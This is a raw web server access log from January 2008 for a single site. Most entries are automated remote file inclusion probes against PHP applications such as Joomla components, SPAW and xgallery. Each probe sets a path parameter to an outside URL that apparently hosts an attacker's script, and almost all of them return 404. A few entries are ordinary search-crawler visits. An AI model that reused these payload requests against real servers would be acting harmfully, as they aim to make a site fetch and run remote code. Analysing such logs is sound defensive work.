80.38.62.39 - - [30/Jan/2008:09:59:10 -0800] "GET //zipndownload.php?PP_PATH=http://www.colecionismo.com.br//modules/coppermine/albums/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
83.149.69.97 - - [30/Jan/2008:09:59:56 -0800] "GET /logs/access_071229.log/include.php?path[docroot]=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.149.69.97 - - [30/Jan/2008:09:59:57 -0800] "GET /logs/include.php?path[docroot]=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.9.155.30 - - [30/Jan/2008:10:00:26 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.108.66.215 - - [30/Jan/2008:10:00:48 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://fantastiki.net/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.44.108 - - [30/Jan/2008:10:02:16 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.44.89 - - [30/Jan/2008:10:02:16 -0800] "GET /logs/access_071225.log HTTP/1.0" 200 195051 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
83.149.69.97 - - [30/Jan/2008:10:02:35 -0800] "GET /logs/access_071225.log/include.php?path[docroot]=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.93.191.226 - - [30/Jan/2008:10:02:39 -0800] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://hungernwnc.org/data/asc.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.93.191.226 - - [30/Jan/2008:10:02:41 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://hungernwnc.org/data/asc.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.93.191.226 - - [30/Jan/2008:10:02:41 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://hungernwnc.org/data/asc.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.54.178.146 - - [30/Jan/2008:10:04:16 -0800] "GET /logs/access_071230.log//index.php?option=com_rsgallery&page=inline&catid=http://jorgevolio.com/.cookies/safe.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.13.54.2 - - [30/Jan/2008:10:04:55 -0800] "GET /logs/access_080101.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
204.13.54.2 - - [30/Jan/2008:10:04:56 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
204.13.54.2 - - [30/Jan/2008:10:04:56 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
204.13.54.2 - - [30/Jan/2008:10:06:51 -0800] "GET /logs/access_080106.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.66.215 - - [30/Jan/2008:10:06:54 -0800] "GET /logs/access_071216.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://fantastiki.net/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.215 - - [30/Jan/2008:10:06:54 -0800] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://fantastiki.net/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.19.136 - - [30/Jan/2008:10:07:06 -0800] "GET /plans/?D=D HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.214.97.225 - - [30/Jan/2008:10:07:15 -0800] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://adrianuzzo1986.altervista.org/cartella/cmdx9.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
128.103.8.13 - - [30/Jan/2008:10:08:03 -0800] "GET /logs/access.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://visual-addicts.com/ind? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
128.103.8.13 - - [30/Jan/2008:10:08:03 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://visual-addicts.com/ind? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
128.103.8.13 - - [30/Jan/2008:10:08:03 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://visual-addicts.com/ind? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.117.128.45 - - [30/Jan/2008:10:08:54 -0800] "GET /logs/access_080101.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.117.128.45 - - [30/Jan/2008:10:08:54 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.117.128.45 - - [30/Jan/2008:10:08:54 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.151.162.98 - - [30/Jan/2008:10:11:04 -0800] "GET /index2.php?x=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.117.128.45 - - [30/Jan/2008:10:11:14 -0800] "GET /logs/access_080106.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.9.155.30 - - [30/Jan/2008:10:11:49 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.155.30 - - [30/Jan/2008:10:11:49 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.155.30 - - [30/Jan/2008:10:12:01 -0800] "GET /logs/access.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:10:12:29 -0800] "GET /logs/access.log/scanhttp://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:10:12:29 -0800] "GET /logs/access.log/scanhttp://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:10:12:29 -0800] "GET /scanhttp://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:10:12:29 -0800] "GET /scanhttp://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.108.66.215 - - [30/Jan/2008:10:12:29 -0800] "GET /logs/access_071202.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://fantastiki.net/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:10:12:29 -0800] "GET /logs/scanhttp://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:10:12:29 -0800] "GET /logs/scanhttp://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:10:12:30 -0800] "GET /logs/access.log/scanhttp://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:10:12:30 -0800] "GET /scanhttp://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:10:12:30 -0800] "GET /logs/scanhttp://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:10:12:32 -0800] "GET /logs/access.log/scanhttp://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:10:12:32 -0800] "GET /logs/access.log/scanhttp://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:10:12:32 -0800] "GET /scanhttp://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:10:12:32 -0800] "GET /scanhttp://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:10:12:32 -0800] "GET /logs/access.log/scanhttp://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:10:12:32 -0800] "GET /logs/scanhttp://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:10:12:32 -0800] "GET /logs/scanhttp://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:10:12:32 -0800] "GET /scanhttp://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:10:12:33 -0800] "GET /logs/scanhttp://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:10:12:34 -0800] "GET /logs/access.log/scanhttp://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:10:12:34 -0800] "GET /scanhttp://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:10:12:34 -0800] "GET /logs/scanhttp://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:10:13:14 -0800] "GET /logs/access.log/scanhttp://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:10:13:15 -0800] "GET /scanhttp://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:10:13:15 -0800] "GET /logs/scanhttp://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:10:13:16 -0800] "GET /logs/access.log/scanhttp://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:10:13:16 -0800] "GET /scanhttp://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:10:13:16 -0800] "GET /logs/scanhttp://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.169.155.140 - - [30/Jan/2008:10:13:23 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.epa.gov/oms/cert/eng-cert/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:10:13:45 -0800] "GET /logs/access.log/scanhttp://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:10:13:45 -0800] "GET /scanhttp://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:10:13:45 -0800] "GET /logs/scanhttp://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.242.98.223 - - [30/Jan/2008:10:14:53 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://mymindmyvoice.com/crit?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
195.242.98.223 - - [30/Jan/2008:10:14:53 -0800] "GET /administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://mymindmyvoice.com/crit?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
69.22.162.60 - - [30/Jan/2008:10:15:27 -0800] "GET /logs/access_080101.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.22.162.60 - - [30/Jan/2008:10:15:27 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.22.162.60 - - [30/Jan/2008:10:15:27 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.41.127 - - [30/Jan/2008:10:15:37 -0800] "GET /logs/access_080106.log/index.php?dir_path=http://www.geocities.com/kitfacil167/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.41.127 - - [30/Jan/2008:10:15:37 -0800] "GET /index.php?dir_path=http://www.geocities.com/kitfacil167/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.41.127 - - [30/Jan/2008:10:15:38 -0800] "GET /logs/index.php?dir_path=http://www.geocities.com/kitfacil167/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.41.127 - - [30/Jan/2008:10:15:40 -0800] "GET /logs/access_071218.log/index.php?dir_path=http://www.geocities.com/kitfacil167/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.233.19.105 - - [30/Jan/2008:10:15:41 -0800] "GET /logs/access.log/config.php?path_to_root=http://www.moskaworned.xpg.com.br/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.233.19.105 - - [30/Jan/2008:10:15:42 -0800] "GET /config.php?path_to_root=http://www.moskaworned.xpg.com.br/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.233.19.105 - - [30/Jan/2008:10:15:42 -0800] "GET /logs/config.php?path_to_root=http://www.moskaworned.xpg.com.br/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.18.175 - - [30/Jan/2008:10:15:54 -0800] "GET /logs/access_071229.log//login.php?dir=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.18.175 - - [30/Jan/2008:10:15:55 -0800] "GET //login.php?dir=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.18.175 - - [30/Jan/2008:10:15:55 -0800] "GET /logs//login.php?dir=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.130.206.51 - - [30/Jan/2008:10:17:02 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://bxsafe.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
194.90.168.130 - - [30/Jan/2008:10:17:22 -0800] "GET /?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.808" "www.dmulk.com"
80.38.62.39 - - [30/Jan/2008:10:17:44 -0800] "GET /logs//main.php?sayfa=http://familia.oscarreno.com.mx//modules/Forums/admin/testbank.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
80.38.62.39 - - [30/Jan/2008:10:17:44 -0800] "GET //main.php?sayfa=http://familia.oscarreno.com.mx//modules/Forums/admin/testbank.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
64.38.10.80 - - [30/Jan/2008:10:18:48 -0800] "GET /logs/access_071229.log/index.php?option=com_glossary&func=display&Itemid=s@bun&catid=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.10.80 - - [30/Jan/2008:10:18:48 -0800] "GET /index.php?option=com_glossary&func=display&Itemid=s@bun&catid=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.10.80 - - [30/Jan/2008:10:18:49 -0800] "GET /logs/index.php?option=com_glossary&func=display&Itemid=s@bun&catid=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.22.162.60 - - [30/Jan/2008:10:18:55 -0800] "GET /logs/access_080106.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.41.127 - - [30/Jan/2008:10:18:55 -0800] "GET /logs/access_080106.log/gallery.php?dir_path=http://www.geocities.com/kitfacil167/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.41.127 - - [30/Jan/2008:10:18:55 -0800] "GET /gallery.php?dir_path=http://www.geocities.com/kitfacil167/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.41.127 - - [30/Jan/2008:10:18:56 -0800] "GET /logs/gallery.php?dir_path=http://www.geocities.com/kitfacil167/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.41.127 - - [30/Jan/2008:10:18:57 -0800] "GET /logs/access_071218.log/gallery.php?dir_path=http://www.geocities.com/kitfacil167/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.242.98.223 - - [30/Jan/2008:10:19:32 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://mymindmyvoice.com/crit?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
195.242.98.223 - - [30/Jan/2008:10:19:38 -0800] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://mymindmyvoice.com/crit?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
67.195.44.91 - - [30/Jan/2008:10:20:58 -0800] "GET /logs/access_071230.log HTTP/1.0" 200 231687 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
58.26.137.64 - - [30/Jan/2008:10:21:39 -0800] "GET /logs/access_071230.log/squirrelcart/cart_content.php?cart_isp_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [30/Jan/2008:10:21:40 -0800] "GET /squirrelcart/cart_content.php?cart_isp_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [30/Jan/2008:10:21:40 -0800] "GET /logs/squirrelcart/cart_content.php?cart_isp_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
200.54.178.146 - - [30/Jan/2008:10:21:47 -0800] "GET /logs/access_071225.log//hysteresis//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://jorgevolio.com/.cookies/safe.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.54.178.146 - - [30/Jan/2008:10:21:47 -0800] "GET //hysteresis//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://jorgevolio.com/.cookies/safe.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.54.178.146 - - [30/Jan/2008:10:21:49 -0800] "GET /logs//hysteresis//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://jorgevolio.com/.cookies/safe.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.250.115 - - [30/Jan/2008:10:22:02 -0800] "GET /logs/access_080106.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.250.115 - - [30/Jan/2008:10:22:02 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.250.115 - - [30/Jan/2008:10:22:02 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.28.34 - - [30/Jan/2008:10:22:11 -0800] "GET /logs/access_071010.log HTTP/1.0" 200 39814 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.190.51.202 - - [30/Jan/2008:10:22:19 -0800] "GET /logs/access.log//modules/Neos_Chronos/header.php?base_folder=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.190.51.202 - - [30/Jan/2008:10:22:20 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.190.51.202 - - [30/Jan/2008:10:22:20 -0800] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.24.226 - - [30/Jan/2008:10:22:34 -0800] "GET /logs/access.log/admin/editor2/spaw_control.class.php?spaw_root=http://www.iseeproject.org/cms/administrator/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.24.226 - - [30/Jan/2008:10:22:34 -0800] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://www.iseeproject.org/cms/administrator/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.24.226 - - [30/Jan/2008:10:22:34 -0800] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://www.iseeproject.org/cms/administrator/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.190.51.202 - - [30/Jan/2008:10:23:20 -0800] "GET /logs/access_071220.log//modules/Neos_Chronos/header.php?base_folder=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.24.226 - - [30/Jan/2008:10:23:43 -0800] "GET /logs/access_071220.log/admin/editor2/spaw_control.class.php?spaw_root=http://www.iseeproject.org/cms/administrator/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.24.226 - - [30/Jan/2008:10:23:43 -0800] "GET /logs/access_071216.log/admin/editor2/spaw_control.class.php?spaw_root=http://www.iseeproject.org/cms/administrator/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.24.226 - - [30/Jan/2008:10:23:43 -0800] "GET /logs/access_071228.log/admin/editor2/spaw_control.class.php?spaw_root=http://www.iseeproject.org/cms/administrator/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.24.226 - - [30/Jan/2008:10:24:00 -0800] "GET /logs/access_071221.log/admin/editor2/spaw_control.class.php?spaw_root=http://www.iseeproject.org/cms/administrator/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.246.252.43 - - [30/Jan/2008:10:24:32 -0800] "GET /logs/access_071230.log/home.php?pag=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.246.252.43 - - [30/Jan/2008:10:24:32 -0800] "GET /home.php?pag=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.246.252.43 - - [30/Jan/2008:10:24:33 -0800] "GET /logs/home.php?pag=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.30.179.226 - - [30/Jan/2008:10:24:54 -0800] "GET /logs/access_070731.log HTTP/1.0" 200 34839 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
81.3.86.86 - - [30/Jan/2008:10:25:06 -0800] "GET /logs/access.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://fantastiki.net/bod.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
59.158.128.138 - - [30/Jan/2008:10:25:07 -0800] "GET /logs/access_071230.log/home.php?pag=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.158.128.138 - - [30/Jan/2008:10:25:08 -0800] "GET /home.php?pag=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.158.128.138 - - [30/Jan/2008:10:25:08 -0800] "GET /logs/home.php?pag=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.93.191.226 - - [30/Jan/2008:10:25:24 -0800] "GET /logs/access_080106.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://hungernwnc.org/data/asc.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.93.191.226 - - [30/Jan/2008:10:25:25 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://hungernwnc.org/data/asc.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.93.191.226 - - [30/Jan/2008:10:25:26 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://hungernwnc.org/data/asc.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
